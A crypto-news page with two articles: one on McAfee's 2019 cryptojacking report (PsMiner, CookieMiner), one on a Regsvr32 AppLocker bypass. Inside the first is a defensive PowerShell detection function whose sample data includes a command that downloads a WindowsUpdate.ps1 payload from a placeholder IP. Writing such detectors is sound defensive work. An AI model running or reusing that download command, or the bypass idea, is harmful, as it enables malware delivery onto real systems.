Aug 30

Cryptojacking Campaigns Rose 29% in Q1, McAfee Says

In the first quarter of 2019, cryptojacking campaigns aimed at victims’ PCs to mine cryptocurrencies rose 29%, according to a recent report by security software provider McAfee.


Hackers Target Windows PCs to Mine Monero

The antivirus maker founded by crypto fan John McAfee discovered that both Windows and Apple ecosystems are equally vulnerable to cryptojacking campaigns.

Most of the mining attacks on Windows computers use PowerShell for propagation and execution. PowerShell is a task automation engine and interactive Command-Line Interface (CLI) created by Microsoft for system administration and configuration management.

In the first quarter, one of the most significant crypto malware campaigns discovered by McAfee was PsMiner. Hackers have been using a Trojan to distribute the mining worm. The malware is designed to mine Monero by exploiting the vulnerabilities in servers running Hadoop, ElasticSearch, Weblogic, Redis, SqlServer, Spring, and ThinkPHP.

Monero (XMR) is a cryptocurrency that allows users to make peer-to-peer transactions anonymously without being traced even by their addresses. The coin is among the 15 largest cryptocurrencies by market cap. As of August 30, it boasts a capitalization of $1.15 billion. Monero is attractive for miners thanks to its generous reward potential. Also, XMR miners don’t have to use expensive GPUs and ASIC systems as in the case of Bitcoin.

Returning to PsMiner: it reaches the victim’s computer via a PowerShell command that downloads the WindowsUpdate.ps1 payload, the McAfee report says.
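The delivery step described above leaves a trace in process command-line logs. The following is an added example, not code from the McAfee report: a hypothetical function, `Find-RemotePs1Launch`, that flags PowerShell command lines fetching a `.ps1` from a URL or naming the WindowsUpdate.ps1 payload. The sample lines and the address in them are constructed.

```powershell
# Added example: flag process command lines where PowerShell pulls a .ps1 from a URL.
# Sample lines are constructed; 203.0.113.0/24 is a documentation address range.
function Find-RemotePs1Launch {
    param([Parameter(Mandatory)][string[]]$CommandLine)

    $psHost   = '(?i)\b(powershell|pwsh)(\.exe)?\b'
    $remotePs = '(?i)\b(?:https?|ftp)://[^\s''"\)]+\.ps1\b'
    $named    = '(?i)\bWindowsUpdate\.ps1\b'   # payload name given in the McAfee report

    foreach ($line in $CommandLine) {
        # Only PowerShell hosts are of interest; an editor opening a .ps1 is ignored.
        if ($line -notmatch $psHost) { continue }

        $reasons = @()
        if ($line -match $remotePs) { $reasons += "remote script: $($Matches[0])" }
        if ($line -match $named)    { $reasons += 'PsMiner payload name' }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Reasons     = $reasons -join '; '
                CommandLine = $line
            }
        }
    }
}

# Constructed command lines standing in for process-creation log entries.
$samples = @(
    'powershell.exe -Command "Invoke-WebRequest http://203.0.113.10/WindowsUpdate.ps1 -OutFile $env:TEMP\WindowsUpdate.ps1"',
    'powershell.exe -File C:\Scripts\Backup-Database.ps1',
    'C:\Windows\System32\notepad.exe C:\notes\WindowsUpdate.ps1'
)

# Only the first sample is reported: a PowerShell host, a remote .ps1, and the payload name.
Find-RemotePs1Launch -CommandLine $samples | Format-List
```

A match on the file name alone is weak evidence, since the name imitates a legitimate Windows component; the remote-URL match is the stronger signal.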

McAfee Report Says Apple Devices Are Vulnerable Too

Besides PsMiner, another malware family, called CookieMiner, has been attacking macOS devices and sharing code with a past campaign to steal digital wallets and credentials. The malware used the EmPyre backdoor to automate the stealing process.

McAfee found that CookieMiner stole data from popular crypto exchanges, including Binance, Coinbase, Bitstamp, Poloniex, Bittrex, and MyEtherWallet. The malware got access to data like passwords to access the crypto exchanges’ sites. However, the main goal was to infect computers to mine Koto.

In general, ransomware attacks rose 118% over the first quarter, the report says. There are new ransomware families, while hackers use innovative techniques. Even so, hackers still need victims’ involuntary cooperation. McAfee concluded:

“Even with all the sophisticated attack techniques being developed, attackers are still highly dependent on human interaction and social engineering.”

Do you think hacking attacks represent one of the most significant problems for the crypto space? Share your thoughts below!


Apr 25

AppLocker Vulnerability Creates Enterprise Malware Threats

Source: bitcoin


Several versions of Microsoft Windows have an extra feature, called AppLocker, that lets business-minded users blacklist or whitelist particular applications. This should reduce the risk of being infected with malware or viruses, but by the look of things the feature can be bypassed rather easily.


Bypassing Windows AppLocker With Relative Ease

Windows is often targeted by Internet criminals all over the world, as it is the most popular operating system across computers and some tablets. Given the recent increase in crypto-ransomware threats, it seems only natural that most of these malware infections involve Windows machines, and it looks like the threat is far from over.

The AppLocker security features found in business-focused versions of Microsoft Windows can easily be disabled by making a small change to the computer register. Although most enterprises use this feature to restrict application usage and access in an attempt to prevent malware infections, it looks like they will have to find alternative solutions.

A recent study by security researcher Casey Smith shows how AppLocker is vulnerable to an exploit that will actually disable this checking procedure. Granted, the computer itself would need to have modifications made by Regsvr32, so it points to a remotely hosted file, but doing so would let systems run just about any application in the world.

Unfortunately, there is no patch to address this vulnerability just yet, although Windows users can rest assured Microsoft is well aware of this situation. One temporary solution enterprises could make use of is to let Windows Firewall block Regsvr32, preventing it from accessing any online file. For companies dealing with dozens of computers on their network, this is far from a perfect solution, though.

Until this AppLocker flaw can be fixed, hackers and Internet criminals will be able to exploit this vulnerability and target enterprises with all kinds of malware. It is not unlikely we will see more crypto-ransomware infections in the coming weeks. Given the stealthy nature of this alteration to Regsvr32, there is hardly a way to detect these changes either, as no administrator access is required to do so.

Are you using AppLocker, and if so, are you concerned about this vulnerability? Let us know in the comments below!

Source: Engadget


The post AppLocker Vulnerability Creates Enterprise Malware Threats appeared first on Bitcoinist.net.
